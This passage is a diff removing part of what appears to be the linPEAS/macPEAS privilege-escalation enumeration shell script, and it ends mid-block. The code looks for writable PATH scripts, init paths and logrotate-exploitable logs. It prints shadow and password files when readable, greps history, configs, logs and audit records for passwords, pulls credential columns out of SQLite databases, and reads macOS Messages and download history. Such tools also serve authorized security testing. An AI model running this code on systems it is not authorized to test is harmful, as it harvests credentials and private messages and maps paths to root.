-#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER
-#  print_2title "Files with ResourceFork"
-#  print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads"
-#  find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork"
-#fi
-#echo ""
-
-##-- IF) .sh files in PATH
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title ".sh files in path"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path"
-  echo $PATH | tr ":" "\n" | while read d; do
-    for f in $(find "$d" -name "*.sh" 2>/dev/null); do
-      if ! [ "$IAMROOT" ] && [ -O "$f" ]; then
-        echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED},"
-      elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits)
-        echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-      else
-        echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},";
-      fi
-    done
-  done
-  echo ""
-
-  broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken)
-  if [ "$broken_links" ] || [ "$DEBUG" ]; then 
-    print_2title "Broken links in path"
-    echo $PATH | tr ":" "\n" | while read d; do
-      find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},";
-    done
-    echo ""
-  fi
-fi
-
-##-- IF) Date times inside firmware
-if [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title "FIles datetimes inside the firmware (limit 50)"
-  find "$SEARCH_IN_FOLDER" -type f -printf "%T+\n" 2>/dev/null | sort | uniq -c | sort | head -n 50
-  echo "To find a file with an specific date execute: find \"$SEARCH_IN_FOLDER\" -type f -printf \"%T+ %p\n\" 2>/dev/null | grep \"<date>\""
-  echo ""
-fi
-
-##-- IF) Executable files added by user
-print_2title "Executable files potentially added by user (limit 70)"
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70
-else
-  find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70
-fi
-echo ""
-
-
-
-if [ "$MACPEAS" ]; then
-  print_2title "Unsigned Applications"
-  macosNotSigned /System/Applications
-fi
-
-##-- IF) Unexpected in /opt
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  if [ "$(ls /opt 2>/dev/null)" ]; then
-    print_2title "Unexpected in /opt (usually empty)"
-    ls -la /opt
-    echo ""
-  fi
-fi
-
-##-- IF) Unexpected folders in /
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title "Unexpected in root"
-  if [ "$MACPEAS" ]; then
-    (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found
-  else
-    (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found
-  fi
-  echo ""
-fi
-
-##-- IF) Files (scripts) in /etc/profile.d/
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title "Files (scripts) in /etc/profile.d/"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files"
-  if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS
-    (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/"
-    check_critial_root_path "/etc/profile"
-    check_critial_root_path "/etc/profile.d/"
-  fi
-  echo ""
-fi
-
-  ##-- IF) Files (scripts) in /etc/init.d/
-  if ! [ "$SEARCH_IN_FOLDER" ]; then
-print_2title "Permissions in init, init.d, systemd, and rc.d"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d"
-  if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS
-    check_critial_root_path "/etc/init/"
-    check_critial_root_path "/etc/init.d/"
-    check_critial_root_path "/etc/rc.d/init.d"
-    check_critial_root_path "/usr/local/etc/rc.d"
-    check_critial_root_path "/etc/rc.d"
-    check_critial_root_path "/etc/systemd/"
-    check_critial_root_path "/lib/systemd/"
-  fi
-
-  echo ""
-fi
-
-##-- IF) Hashes in passwd file
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_list "Hashes inside passwd file? ........... "
-  if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
-  else echo_no
-  fi
-
-  ##-- IF) Writable in passwd file
-  print_list "Writable passwd file? ................ "
-  if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-  elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-  elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-  else echo_no
-  fi
-
-  ##-- IF) Credentials in fstab
-  print_list "Credentials in fstab/mtab? ........... "
-  if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
-  else echo_no
-  fi
-
-  ##-- IF) Read shadow files
-  print_list "Can I read shadow files? ............. "
-  if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
-  else echo_no
-  fi
-
-  print_list "Can I read shadow plists? ............ "
-  possible_check=""
-  (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no
-
-  print_list "Can I write shadow plists? ........... "
-  possible_check=""
-  (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no
-
-  ##-- IF) Read opasswd file
-  print_list "Can I read opasswd file? ............. "
-  if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo ""
-  else echo_no
-  fi
-
-  ##-- IF) network-scripts
-  print_list "Can I write in network-scripts? ...... "
-  if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-  elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-  else echo_no
-  fi
-
-  ##-- IF) Read root dir
-  print_list "Can I read root folder? .............. "
-  (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no
-  echo ""
-fi
-
-##-- IF) Root files in home dirs
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title "Searching root files in home dirs (limit 30)"
-  (find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found
-  echo ""
-fi
-
-##-- IF) Others files in my dirs
-if ! [ "$IAMROOT" ]; then
-  print_2title "Searching folders owned by me containing others files on it (limit 100)"
-  (find $ROOT_FOLDER -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g"
-  echo ""
-fi
-
-##-- IF) Readable files belonging to root and not world readable
-if ! [ "$IAMROOT" ]; then
-  print_2title "Readable files belonging to root and readable by me but not world readable"
-  (find $ROOT_FOLDER -type f -user root ! -perm -o=r ! -path "/proc/*" 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found
-  echo ""
-fi
-
-##-- IF) Modified interesting files into specific folders in the last 5mins
-print_2title "Modified interesting files in the last 5mins (limit 100)"
-find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED},"
-echo ""
-
-##-- IF) Writable log files
-if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below
-print_2title "Writable log files (logrotten) (limit 50)"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation"
-  logrotate --version 2>/dev/null || echo_not_found "logrotate"
-  lastWlogFolder="ImPOsSiBleeElastWlogFolder"
-  logfind=$(find $ROOT_FOLDER -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50)
-  printf "%s\n" "$logfind" | while read log; do
-    if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found
-      if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC;
-      elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case
-      elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log";
-      elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g";
-      fi
-    fi
-  done
-fi
-
-echo ""
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  ##-- IF) Files inside my home
-  print_2title "Files inside $HOME (limit 20)"
-  (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found
-  echo ""
-
-  ##-- IF) Files inside /home
-  print_2title "Files inside others home (limit 20)"
-  (find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found
-  echo ""
-
-  ##-- IF) Mail applications
-  print_2title "Searching installed mail applications"
-  ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" | sort | uniq
-  echo ""
-
-  ##-- IF) Mails
-  print_2title "Mails (limit 50)"
-  (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found
-  echo ""
-
-  ##-- IF) Backup folders
-  if [ "$backup_folders" ] || [ "$DEBUG" ]; then
-    print_2title "Backup folders"
-    printf "%s\n" "$backup_folders" | while read b ; do
-      ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g";
-      ls -l "$b" 2>/dev/null && echo ""
-    done
-    echo ""
-  fi
-fi
-
-##-- IF) Backup files
-print_2title "Backup files (limited 100)"
-backs=$(find $ROOT_FOLDER -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null)
-printf "%s\n" "$backs" | head -n 100 | while read b ; do
-  if [ -r "$b" ]; then
-    ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g";
-  fi;
-done
-echo ""
-
-##-- IF) DB files
-if [ "$MACPEAS" ]; then
-  print_2title "Reading messages database"
-  sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null
-  sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null
-  sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null
-
-fi
-
-
-if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then
-  print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)"
-  FILECMD="$(command -v file 2>/dev/null)"
-  printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
-    if [ "$FILECMD" ]; then
-      echo "Found "$(file "$f") | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g";
-    else
-      echo "Found $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g";
-    fi
-  done
-  SQLITEPYTHON=""
-  echo ""
-  printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
-    if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd
-      if [ "$(command -v sqlite3 2>/dev/null)" ]; then
-        tables=$(sqlite3 $f ".tables" 2>/dev/null)
-        #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
-      elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then
-        SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null)
-        tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null)
-        #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
-      else
-        tables=""
-      fi
-      if [ "$tables" ] || [ "$DEBUG" ]; then
-          printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC
-          printf "%s\n" "$tables" | while read t; do
-          columns=""
-          # Search for credentials inside the table using sqlite3
-          if [ -z "$SQLITEPYTHON" ]; then
-            columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE")
-          # Search for credentials inside the table using python
-          else
-            columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null)
-          fi
-          #Check found columns for interesting fields
-          INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt")
-          if [ "$INTCOLUMN" ]; then
-            printf ${BLUE}"  --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g"
-            printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g"
-            (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head
-            echo ""
-          fi
-        done
-      fi
-    fi
-  done
-fi
-echo ""
-
-if [ "$MACPEAS" ]; then
-  print_2title "Downloaded Files"
-  sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|"
-fi
-
-##-- IF) Web files
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title "Web files?(output limit)"
-  ls -alhR /var/www/ 2>/dev/null | head
-  ls -alhR /srv/www/htdocs/ 2>/dev/null | head
-  ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head
-  ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head
-  echo ""
-fi
-
-##-- IF) All hidden files
-print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)"
-find $ROOT_FOLDER -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70
-echo ""
-
-##-- IF) Readable files in /tmp, /var/tmp, bachups
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)"
-  filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70)
-  printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done
-  echo ""
-fi
-
-##-- IF) Interesting writable files by ownership or all
-if ! [ "$IAMROOT" ]; then
-  print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files"
-  #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all
-  obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500)
-  printf "%s\n" "$obmowbe" | while read entry; do
-    if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC;
-    elif echo "$entry" | grep -qE "$writeVB"; then
-      echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
-    else
-      echo "$entry" | sed -${E} "s,$writeB,${SED_RED},"
-    fi
-  done
-  echo ""
-fi
-
-##-- IF) Interesting writable files by group
-if ! [ "$IAMROOT" ]; then
-  print_2title "Interesting GROUP writable files (not in Home) (max 500)"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files"
-  for g in $(groups); do
-    iwfbg=$(find $ROOT_FOLDER '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500)
-    if [ "$iwfbg" ] || [ "$DEBUG" ]; then
-      printf "  Group $GREEN$g:\n$NC";
-      printf "%s\n" "$iwfbg" | while read entry; do
-        if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC;
-        elif echo "$entry" | grep -Eq "$writeVB"; then
-          echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
-        else
-          echo "$entry" | sed -${E} "s,$writeB,${SED_RED},"
-        fi
-      done
-    fi
-  done
-  echo ""
-fi
-
-##-- IF) Passwords in history cmd
-if [ "$(history 2>/dev/null)" ] || [ "$DEBUG" ]; then
-  print_2title "Searching passwords in history cmd"
-  history | grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"
-  echo ""
-fi
-
-##-- IF) Passwords in history files
-if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then
-  print_2title "Searching passwords in history files"
-  printf "%s\n" "$PSTORAGE_HISTORY" | while read f; do grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done
-  echo ""
-fi
-
-##-- IF) Passwords in config PHP files
-if [ "$PSTORAGE_PHP_FILES" ] || [ "$DEBUG" ]; then
-  print_2title "Searching passwords in config PHP files"
-  printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done
-  echo ""
-fi
-
-##-- IF) Passwords files in home
-if [ "$PSTORAGE_PASSWORD_FILES" ] || [ "$DEBUG" ]; then
-  print_2title "Searching *password* or *credential* files in home (limit 70)"
-  (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print "  #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found
-  echo ""
-fi
-
-##-- IF) TTY passwords
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title "Checking for TTY (sudo/su) passwords in audit logs"
-  aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g"
-  find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g"
-  echo ""
-fi
-
-##-- IF) IPs inside logs
-if [ "$DEBUG" ]; then
-  print_2title "Searching IPs inside logs (limit 70)"
-  (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70
-  echo ""
-fi
-
-##-- IF) Passwords inside logs
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title "Searching passwords inside logs (limit 70)"
-  (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED},"
-  echo ""
-fi
-
-if [ "$DEBUG" ]; then
-  ##-- IF) Emails inside logs
-  print_2title "Searching emails inside logs (limit 70)"
-  (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g"
-  echo ""
-fi
-
-
-
-
-if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then
-  ##-- IF) Find possible files with passwords
-  print_2title "Searching passwords inside key folders (limit 70) - only PHP files"
-  if ! [ "$SEARCH_IN_FOLDER" ]; then
-    intpwdfiles=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ $backup_folders_row /tmp /etc /mnt /private -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null)
-  else
-    intpwdfiles=$(timeout 150 find $SEARCH_IN_FOLDER -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null)
-  fi
-  printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g"
-  echo ""
-
-  print_2title "Searching passwords inside key folders (limit 70) - no PHP files"
-  printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g"
-  echo ""
-
-  ##-- IF) Find possible files with passwords
-  print_2title "Searching possible password variables inside key folders (limit 140)"
-  if ! [ "$SEARCH_IN_FOLDER" ]; then
-    timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" &
-    timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" &
-  else
